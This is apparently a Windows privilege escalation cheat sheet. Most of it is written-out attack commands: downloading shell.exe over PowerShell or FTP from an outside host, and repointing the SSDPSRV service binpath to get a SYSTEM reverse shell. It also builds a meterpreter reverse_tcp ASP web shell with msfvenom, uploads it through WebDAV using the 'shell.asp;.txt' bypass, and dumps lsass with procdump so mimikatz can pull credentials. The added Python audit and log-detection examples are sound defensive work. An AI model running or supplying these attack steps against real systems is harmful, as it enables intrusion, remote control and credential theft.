Windows Privilege Escalation


Uploading Files to a Windows Machine from Kali Linux

Using PowerShell

To start an HTTP server on the Kali machine (serves the current directory on port 8000):

python -m SimpleHTTPServer

To download shell.exe on the Windows machine from the command line:

powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/shell.exe','C:\Users\test\Desktop\shell.exe')"

Using FTP

To install the FTP server module for Python:

apt-get install python-pyftpdlib  

To start the FTP server:

python -m pyftpdlib -p 21

To download shell.exe from the FTP server in one command (writes an ftp script file and then runs ftp with it):

echo open 192.168.1.1>ftp_commands.txt&echo anonymous>>ftp_commands.txt&echo password>>ftp_commands.txt&echo binary>>ftp_commands.txt&echo get shell.exe>>ftp_commands.txt&echo bye>>ftp_commands.txt&ftp -s:ftp_commands.txt

AccessCheck

Download AccessCheck

# Excerpt from a larger Kali provisioning script: STAGE, TOTAL, GREEN, RED and RESET
# (a step counter and terminal colour codes) are defined earlier in that script.
(( STAGE++ )); echo -e "\n\n ${GREEN}[+]${RESET} (${STAGE}/${TOTAL}) Downloading ${GREEN}AccessChk.exe${RESET} ~ Windows environment tester"
apt -y -qq install curl windows-binaries unzip \
  || echo -e ' '${RED}'[!] Issue with apt install'${RESET} 1>&2
echo -n '[1/2]'; timeout 300 curl --progress -k -L -f "https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe" > /usr/share/windows-binaries/accesschk_v5.02.exe \
  || echo -e ' '${RED}'[!]'${RESET}" Issue downloading accesschk_v5.02.exe" 1>&2   #***!!! hardcoded path!
echo -n '[2/2]'; timeout 300 curl --progress -k -L -f "https://download.sysinternals.com/files/AccessChk.zip" > /usr/share/windows-binaries/AccessChk.zip \
  || echo -e ' '${RED}'[!]'${RESET}" Issue downloading AccessChk.zip" 1>&2
unzip -q -o -d /usr/share/windows-binaries/ /usr/share/windows-binaries/AccessChk.zip
rm -f /usr/share/windows-binaries/{AccessChk.zip,Eula.txt}


On Windows XP, use AccessChk version 5.2 (accesschk_v5.02.exe above).

When uploading AccessChk to the target over FTP, switch to binary mode first by typing binary right after connecting; in ASCII mode the FTP client rewrites line endings and corrupts the executable.

AccessCheck usage examples

accesschk_v5.02.exe /accepteula -uwcqv "Authenticated Users" *

-u  suppress errors
-w  show only objects that have write access
-c  name is a Windows service, e.g. ssdpsrv; specify "*" as the name to show all services and "scmanager" to check the security of the Service Control Manager
-q  omit banner
-v  verbose

Example output:

[screenshot: accesschk output]
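The accesschk run above is the manual way to spot services that "Authenticated Users" can reconfigure. The following is an added example (not code from the original post) that does the same triage automatically over saved accesschk -uwcqv output, flagging every service on which the audited principal holds a right that allows changing its configuration or its DACL. The sample output is constructed to mimic accesschk's -cv layout (an "RW <service>" line followed by indented access-right names); the right names are the standard Windows service access rights.

```python
"""Audit accesschk -uwcqv output for services a low-privileged principal can reconfigure.

Added example, not code from the original post. SAMPLE_ACCESSCHK_OUTPUT is constructed to
mimic accesschk's -cv layout ("RW <service>" followed by indented access-right names).
"""
import re

# Rights that allow changing the service's binary path or logon account, or rewriting its
# DACL; these are what the "sc config ... binpath= / obj=" sequence relies on.
RECONFIGURE_RIGHTS = {
    "SERVICE_ALL_ACCESS",
    "SERVICE_CHANGE_CONFIG",
    "WRITE_DAC",
    "WRITE_OWNER",
    "GENERIC_WRITE",
    "GENERIC_ALL",
}

# Constructed sample: two fully writable services, one read-only, one with a single risky right.
SAMPLE_ACCESSCHK_OUTPUT = """\
RW SSDPSRV
        SERVICE_ALL_ACCESS
RW upnphost
        SERVICE_ALL_ACCESS
R  Dnscache
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        READ_CONTROL
RW wuauserv
        SERVICE_START
        SERVICE_STOP
        SERVICE_CHANGE_CONFIG
"""

# Header line: access summary (R, W or RW) followed by the service name.
HEADER_RE = re.compile(r"^([RW]+)\s+(\S+)\s*$")


def parse_accesschk(text):
    """Return {service_name: set(right_names)} from accesschk -cv style output."""
    services = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0].isspace():
            # Indented line: an access right belonging to the current service.
            if current is not None:
                services[current].add(line.strip())
            continue
        match = HEADER_RE.match(line)
        if match:
            current = match.group(2)
            services[current] = set()
        else:
            # Banner or error text: do not attach the following rights to any service.
            current = None
    return services


def find_reconfigurable_services(text, risky=RECONFIGURE_RIGHTS):
    """Map each service to the sorted risky rights the audited principal holds on it."""
    findings = {}
    for name, rights in parse_accesschk(text).items():
        held = rights & risky
        if held:
            findings[name] = sorted(held)
    return findings


if __name__ == "__main__":
    for name, rights in sorted(find_reconfigurable_services(SAMPLE_ACCESSCHK_OUTPUT).items()):
        print(f"{name}: {', '.join(rights)}")
```

Run it against a file captured with accesschk_v5.02.exe /accepteula -uwcqv "Authenticated Users" * > services.txt on the host being audited. Any service it lists is a privilege escalation path for every authenticated user; the fix is to tighten that service's security descriptor (sc sdset, or the System Services policy in Group Policy) so that only administrators hold SERVICE_CHANGE_CONFIG and the WRITE_* rights.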


Service controller

sc qc SSDPSRV

Example output:

[screenshot: sc qc SSDPSRV output]

To escalate privileges we change the service's binary path and the account it runs under, then start the service so that our binary runs with SYSTEM privileges:

sc config SSDPSRV binpath= "C:\shell.exe"
sc config SSDPSRV obj= ".\LocalSystem" password= ""
sc config SSDPSRV start= demand
net start SSDPSRV

And hopefully on our server we’ll have a reverse shell with system privileges:

[screenshot: reverse shell with SYSTEM privileges]

To show all network connections with their owning process IDs:

netstat -ano

[screenshot: netstat -ano output]

An unprivileged user sees only PIDs, not full process names (as in the screenshot above). To map a PID to its process name:

tasklist | findstr /c:"1768"

Whitespaces in directory traversal on Windows machine T_T

When trying to perform a directory traversal attack on Femitter FTP I was not able to list the directory contents because of the whitespace in the path.

[screenshot: directory traversal listing fails on a path containing spaces]

The solution is to use the MS Windows short (8.3) directory name C:\Docume~1\ instead of C:\Documents and Settings:

[screenshot: directory traversal listing succeeds with the short name]

I love Windows syntax! Joking

Exploiting WebDAV with Metasploit and cadaver

To discover whether WebDAV is enabled you can use the auxiliary/scanner/http/webdav_scanner module:

[screenshot: webdav_scanner output]

To see which HTTP methods are allowed you can use the auxiliary/scanner/http/options module. If the PUT method is allowed you can probably upload a web shell (.asp). In my case .asp file upload was forbidden and only .txt and .html were allowed. In such a situation we should upload file.txt and then copy it as file.asp;.txt.

To upload files we will use the cadaver tool, which is already installed in Kali 2.0. We will upload a pregenerated shell.asp meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f asp > shell.asp
cadaver http://10.1.1.1/
put shell.asp shell.txt
copy shell.txt shell.asp;.txt

And now we have successfully uploaded the shell:

[screenshot: shell.txt uploaded and copied to shell.asp;.txt]

And executed it:

[screenshot: shell.asp;.txt executed]

Hooray ^_^
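From the server side, the sequence above leaves a distinctive trace in the IIS W3C log: a rejected PUT of the .asp file, an accepted PUT of a .txt file, a COPY, and then a request for a file whose name has a script extension in front of a semicolon. The following is an added example (not code from the original post) that parses such a log using its #Fields: directive and flags both the WebDAV write attempts and any request for a name of the form something.asp;something. The log lines are constructed for this example; the field layout follows the W3C extended format IIS writes, and the user agent strings are made up.

```python
"""Flag WebDAV write activity and the ';' extension trick in IIS W3C extended logs.

Added example, not code from the original post. SAMPLE_IIS_LOG is constructed (IIS 6 style
W3C fields) to replay the sequence described above: a rejected PUT of shell.asp, an accepted
PUT of shell.txt, a COPY, then a request for shell.asp;.txt.
"""

# WebDAV methods that create or modify server-side content.
WRITE_METHODS = {"PUT", "COPY", "MOVE", "MKCOL", "DELETE", "PROPPATCH"}
# Script extensions that matter when they appear before a ';' in the requested file name.
SCRIPT_EXTENSIONS = {"asp", "aspx", "asa"}

SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2016-03-01 10:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2016-03-01 10:00:00 10.1.1.1 OPTIONS / - 80 - 10.1.1.2 cadaver/0.23.3 200
2016-03-01 10:00:01 10.1.1.1 PUT /shell.asp - 80 - 10.1.1.2 cadaver/0.23.3 403
2016-03-01 10:00:02 10.1.1.1 PUT /shell.txt - 80 - 10.1.1.2 cadaver/0.23.3 201
2016-03-01 10:00:03 10.1.1.1 COPY /shell.txt - 80 - 10.1.1.2 cadaver/0.23.3 201
2016-03-01 10:00:07 10.1.1.1 GET /shell.asp;.txt - 80 - 10.1.1.2 Mozilla/5.0 200
2016-03-01 10:00:09 10.1.1.1 GET /index.html - 80 - 10.1.1.3 Mozilla/5.0 200
"""


def parse_w3c_log(text):
    """Yield one dict per request line, using the #Fields: directive for column names."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("request line before #Fields: directive")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip it rather than misalign the columns
        yield dict(zip(fields, values))


def semicolon_script_name(uri_stem):
    """True if the file name contains ';' and the part before it has a script extension."""
    name = uri_stem.rsplit("/", 1)[-1]
    if ";" in name:
        before, _ = name.split(";", 1)
        if "." in before and before.rsplit(".", 1)[-1].lower() in SCRIPT_EXTENSIONS:
            return True
    return False


def find_webdav_findings(text):
    """Return (method, uri, status, rule) tuples for write attempts and ';' bypass requests."""
    findings = []
    for rec in parse_w3c_log(text):
        method, uri, status = rec["cs-method"], rec["cs-uri-stem"], rec["sc-status"]
        if method in WRITE_METHODS:
            findings.append((method, uri, status, "webdav_write"))
        if semicolon_script_name(uri):
            findings.append((method, uri, status, "semicolon_extension_bypass"))
    return findings


if __name__ == "__main__":
    for method, uri, status, rule in find_webdav_findings(SAMPLE_IIS_LOG):
        print(f"{rule:28} {method:6} {uri} -> {status}")
```

Two caveats worth knowing: the default IIS log does not record the Destination header of a COPY or MOVE, so the renamed file name only becomes visible when it is later requested, which is why the second rule looks at GET requests; and a rejected PUT (status 403) is kept as a finding on purpose, since the failed attempt is the earliest signal of the activity. Disabling WebDAV write methods for anonymous users, or the extension itself, removes the exposure the post relies on.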

Dumping LSASS and getting creds

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Procdump can be downloaded here

Copy lsass.dmp to your own machine and run mimikatz on it there. Mimikatz can be downloaded here

mimikatz.exe

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords

Enumerate Domain Controllers

nltest /dclist:domainname
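Every technique on this page is driven from a command line, which is what makes them visible in process creation telemetry (Sysmon Event ID 1 or Windows Security event 4688 with command line auditing enabled). The following is an added example (not code from the original post) that matches the exact command shapes used above, the PowerShell WebClient download, the scripted ftp -s: transfer, the sc config binpath= / obj= change, the procdump dump of lsass and the nltest /dclist enumeration, against a list of events. The events are constructed and reduced to the fields the rules need; the rule names and severity levels are this example's own, not a vendor's.

```python
"""Match the command lines used on this page against process-creation telemetry.

Added example, not code from the original post. SAMPLE_EVENTS is constructed to look like
Sysmon Event ID 1 / Windows 4688 records reduced to the fields the rules need; the rule
names and severities are this example's own, not a vendor's.
"""
import re

SEVERITY_ORDER = ["low", "medium", "high", "critical"]

# (rule name, severity, pattern). Each pattern targets one technique from the post.
RULES = [
    ("powershell_webclient_download", "medium",
     re.compile(r"WebClient\)?\.Download(?:File|String)\b", re.I)),
    ("ftp_scripted_transfer", "medium",
     re.compile(r"\bftp(?:\.exe)?\s+[-/]s:", re.I)),
    ("service_config_change", "high",
     re.compile(r"\bsc(?:\.exe)?\s+config\s+\S+\s+.*\b(?:binpath|obj)\s*=", re.I)),
    ("lsass_memory_dump", "critical",
     re.compile(r"\bprocdump(?:\.exe)?\b.*\blsass\b", re.I)),
    ("dc_enumeration", "low",
     re.compile(r"\bnltest(?:\.exe)?\s+/dclist", re.I)),
]

# Constructed events: the post's commands plus two benign ones that must not fire.
SAMPLE_EVENTS = [
    {"time": "10:01", "user": "WIN\\test", "image": "powershell.exe",
     "cmdline": "powershell.exe -c \"(new-object System.Net.WebClient).DownloadFile("
                "'http://192.168.1.1/shell.exe','C:\\Users\\test\\Desktop\\shell.exe')\""},
    {"time": "10:02", "user": "WIN\\test", "image": "ftp.exe",
     "cmdline": "ftp -s:ftp_commands.txt"},
    {"time": "10:03", "user": "WIN\\test", "image": "sc.exe",
     "cmdline": "sc config SSDPSRV binpath= \"C:\\shell.exe\""},
    {"time": "10:03", "user": "WIN\\test", "image": "sc.exe",
     "cmdline": "sc qc SSDPSRV"},
    {"time": "10:05", "user": "WIN\\admin", "image": "procdump.exe",
     "cmdline": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"time": "10:06", "user": "WIN\\test", "image": "nltest.exe",
     "cmdline": "nltest /dclist:domainname"},
    {"time": "10:07", "user": "WIN\\test", "image": "powershell.exe",
     "cmdline": "powershell.exe -c \"Get-Process\""},
]


def match_rules(cmdline):
    """Return the names of all rules whose pattern matches the command line, in RULES order."""
    return [name for name, _severity, pattern in RULES if pattern.search(cmdline)]


def scan(events):
    """Return one finding per event that triggered at least one rule, with the top severity."""
    findings = []
    for index, event in enumerate(events):
        hits = match_rules(event["cmdline"])
        if not hits:
            continue
        severity = max((sev for name, sev, _ in RULES if name in hits),
                       key=SEVERITY_ORDER.index)
        findings.append({"index": index, "user": event["user"],
                         "rules": hits, "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        event = SAMPLE_EVENTS[finding["index"]]
        print(f"[{finding['severity']:8}] {event['time']} {finding['user']}: "
              f"{', '.join(finding['rules'])} <- {event['cmdline']}")
```

The service rule is the one to correlate further: a sc config change also produces System log event 7040 (start type changed) from the Service Control Manager, and the combination of a non-administrative user, a binary path under a user-writable directory and a following net start is what turns a noisy rule into a confident alert. The procdump rule will also fire on legitimate administrator troubleshooting, which is still worth reviewing given what an lsass dump yields.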